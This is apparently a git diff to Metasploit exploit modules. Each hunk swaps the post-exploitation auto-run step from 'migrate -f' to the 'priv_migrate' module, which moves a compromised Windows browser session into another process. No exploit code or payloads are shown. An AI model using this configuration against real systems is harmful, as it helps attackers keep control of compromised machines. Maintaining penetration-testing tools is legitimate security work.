diff --git a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb
index fb953019b4..e3d674c967 100644
--- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb
+++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
index 5d223c0b62..f1351ca547 100644
--- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
+++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb
index c8c48f817f..a3acec9c72 100644
--- a/modules/exploits/windows/browser/ms10_002_ie_object.rb
+++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
index 3bc77c655b..cfd43a5b1a 100644
--- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
+++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
index 205ab89161..4735af705f 100644
--- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
+++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb
index a0d8c78154..6866f86857 100644
--- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb
+++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => %w{ win },
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
index fa32a72eb7..adecbbaa0e 100644
--- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
+++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
index 00a7558b92..6ad6f0d3f7 100644
--- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
index 8d6ebad0b1..e6e9341fee 100644
--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb
index b31eaf3ef2..e5b79c692f 100644
--- a/modules/exploits/windows/browser/ms11_081_option.rb
+++ b/modules/exploits/windows/browser/ms11_081_option.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb
index b382a1498c..0ce8917f60 100644
--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb
index 16cec1843d..1e4148a5fe 100644
--- a/modules/exploits/windows/browser/ms12_004_midi.rb
+++ b/modules/exploits/windows/browser/ms12_004_midi.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'             => "process",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
index af516188b1..bd21e67a57 100644
--- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
+++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb
index ae82b71a96..8e1aa2f595 100644
--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
index 66098c6c37..da1bca2765 100644
--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'	  => 'win',
       'Targets'	  =>
diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
index d766b0638d..a9a55bf86b 100644
--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'EXITFUNC'             => 'thread'
         },
       'Platform'       => 'win',
diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
index 09200f72af..9aace12737 100644
--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Arch'           => ARCH_X86,
diff --git a/modules/exploits/windows/browser/ms13_055_canchor.rb b/modules/exploits/windows/browser/ms13_055_canchor.rb
index 55980c503d..9aff17a110 100644
--- a/modules/exploits/windows/browser/ms13_055_canchor.rb
+++ b/modules/exploits/windows/browser/ms13_055_canchor.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       # Bug was patched in July 2013. Tsai was the first to publish the bug.
diff --git a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
index fc2563ea71..bc1a43968d 100644
--- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
+++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "Jun 27 2013",
diff --git a/modules/exploits/windows/browser/ms13_069_caret.rb b/modules/exploits/windows/browser/ms13_069_caret.rb
index 6178bc76a8..ea4b88d0fd 100644
--- a/modules/exploits/windows/browser/ms13_069_caret.rb
+++ b/modules/exploits/windows/browser/ms13_069_caret.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "Sep 10 2013",
diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
index 6ee1ddd0da..e635e9d0f5 100644
--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           #'PrependMigrate'       => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       # Jsunpack first received a sample to analyze on Sep 12 2013.
diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
index 136025b1a0..04a9053d34 100644
--- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
+++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false
         },
       'Privileged'     => false,
diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
index 5b709aacba..8905a75dc4 100644
--- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
+++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false
         },
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ms14_012_textrange.rb b/modules/exploits/windows/browser/ms14_012_textrange.rb
index 5b2f00c98e..8b62789967 100644
--- a/modules/exploits/windows/browser/ms14_012_textrange.rb
+++ b/modules/exploits/windows/browser/ms14_012_textrange.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'Retries'              => false, # You're too kind, tab recovery, I only need 1 shell.
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday
       'DefaultTarget'  => 0))
diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
index dac7e039f8..d55c8d119f 100644
--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
index a61d88ca68..98709c17f2 100644
--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
index 611029ad99..a309616e1f 100644
--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
index e943b11db0..18cdbcf0f9 100644
--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
index f4cccba075..57f35dfbae 100644
--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
index 9335d80815..9d51003aa1 100644
--- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
+++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f -k'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb
index 7184ac812a..4bb79207f8 100644
--- a/modules/exploits/windows/browser/ovftool_format_string.rb
+++ b/modules/exploits/windows/browser/ovftool_format_string.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb
index d4018ccb1e..7d067b8eb4 100644
--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb
index af452faef1..a9ed766c59 100644
--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb
index 5b81c4d16d..1b07abfa48 100644
--- a/modules/exploits/windows/browser/realplayer_qcp.rb
+++ b/modules/exploits/windows/browser/realplayer_qcp.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform' => 'win',
       'Targets'  =>
diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb
index 2397e4d9f4..4a1686f131 100644
--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'         =>
         {
diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
index 057ff83b3c..53ac3660ed 100644
--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
index 73ca64f4bd..571f5785ce 100644
--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
index f950ccbaac..a0c78377bb 100644
--- a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
+++ b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "May 30 2013",
diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb
index 4540017403..84ee5ad5ef 100644
--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
index 4544396f52..1d2957285a 100644
--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
index 3f80edb8c0..1ae1aa5fda 100644
--- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
+++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
index aafaccaa1b..71c60f312d 100644
--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'EXITFUNC' => 'process',
           'DisablePayloadHandler' => false,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb
index e414e6fa6f..833f151a25 100644
--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'  =>
diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb
index 2e33ace44f..bc823fdf71 100644
--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'  =>
diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb
index 6e337c99a7..d624fa9a03 100644
--- a/modules/exploits/windows/browser/webex_ucf_newobject.rb
+++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
index ea7cda3260..73e9252478 100644
--- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
+++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'BrowserRequirements' =>
         {
diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb
index e73dab9d78..e847a7952b 100644
--- a/modules/exploits/windows/browser/wmi_admintools.rb
+++ b/modules/exploits/windows/browser/wmi_admintools.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {
diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
index 07d4cd0d81..8c1ba38bf0 100644
--- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
+++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'      =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'            => 'win',
       'Arch'                => ARCH_X86,
diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
index 3a30a85b77..1ddbe7e53e 100644
--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>
diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb
index b552117821..8c5e737b33 100644
--- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb
+++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'             => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
